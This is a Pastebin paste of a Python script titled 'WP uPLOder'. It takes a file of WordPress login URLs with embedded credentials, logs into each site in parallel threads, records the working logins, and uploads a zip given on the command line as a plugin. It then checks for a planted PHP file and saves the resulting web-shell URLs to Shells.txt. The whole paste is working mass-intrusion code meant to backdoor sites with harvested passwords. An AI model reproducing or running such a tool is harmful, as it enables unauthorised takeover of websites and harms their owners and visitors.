Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/user/bin/python
- import requests
- import sys, re, os
- from multiprocessing import Pool
- from multiprocessing.dummy import Pool as ThreadPool
- from platform import system
- log = '''\n
- WP uPLOder
- '
- \n'''
- print log
- def WploginShell(url):
- Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
- lib = requests.session()
- try:
- ## Words Regex
- First = re.findall('http://(.*?)/wp-login.php',url)
- site = 'http://'+First[0]
- GetRegex= lib.get(site+'/wp-login.php')
- # Regex Words of login
- Regex = re.findall('"button button-primary button-large" value="(.*?)"',GetRegex.content)
- # User and Pass get it from File
- User = re.findall('@(.*?)#',url)
- Passwd = re.findall('&(.*?)@',url)
- # Post Data login
- Pax = {'log':User[0],
- 'pwd':Passwd[0],
- 'wp-submit':Regex[0],
- 'redirect_to': site+'/wp-admin/',
- 'testcookie':'1'}
- req = lib.post(site+'/wp-login.php', data=Pax, headers=Headers)
- print req
- print req
- if '<li id="wp-admin-bar-logout">' in req.content:
- save = open("logins.txt", 'a')
- save.write('[+]Login Success '+'\n'+"[#]Target:"+site+'\n'+'[#]UserName:'+User[0]+'\n'+'[#]Password:'+Passwd[0])
- save.close()
- print '[+]Login Success '+'\n'+"[#]Target:"+site+'\n'+'[#]UserName:'+User[0]+'\n'+'[#]Password:'+Passwd[0]
- # Path for get Data
- reqs = lib.get(site+'/wp-admin/plugin-install.php?tab=upload')
- Regex1 = re.findall('id="_wpnonce" name="_wpnonce" value="(.*?)"',reqs.content)
- Regex2 = re.findall('id="install-plugin-submit" class="button" value="(.*?)"',reqs.content)
- # Shell Uploads
- FileUpload = sys.argv[2]
- b0x = {'_wpnonce':Regex1[0],
- '_wp_http_referer':site+'/wp-admin/plugin-install.php?tab=upload',
- 'install-plugin-submit':Regex2[0] }
- b0x2 = {'pluginzip':(FileUpload, open(FileUpload, 'rb'), 'multipart/form-data')}
- login = lib.post(site+'/wp-admin/update.php?action=upload-plugin',data=b0x, files=b0x2, headers=Headers )
- uploads = lib.post(site+'/wp-admin/update.php?action=upload-plugin',files=b0x2, headers=Headers )
- exploit = requests.get(site+'/wp-content/plugins/sigma-wp/gfaddoncommon.php')
- if 'OK' in exploit.content:
- print "[#]:Uploaded Done :"+site
- open('Shells.txt', 'a').write(site+'/wp-content/plugins/sigma-wp/20171820.php'+'\n')
- else:
- print "[-]Fail Uploaded !!!!!!!!>"+site
- else:
- print '[-] Login Fail '+site
- except:
- pass
- def start():
- for i in Files.readlines():
- try:
- i = i.strip()
- data=WploginShell(i)
- except:
- pass
- Files = open(sys.argv[1], 'r')
- pool = ThreadPool(10)
- pool.map(WploginShell, Files)
- pool.close()
- pool.join()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement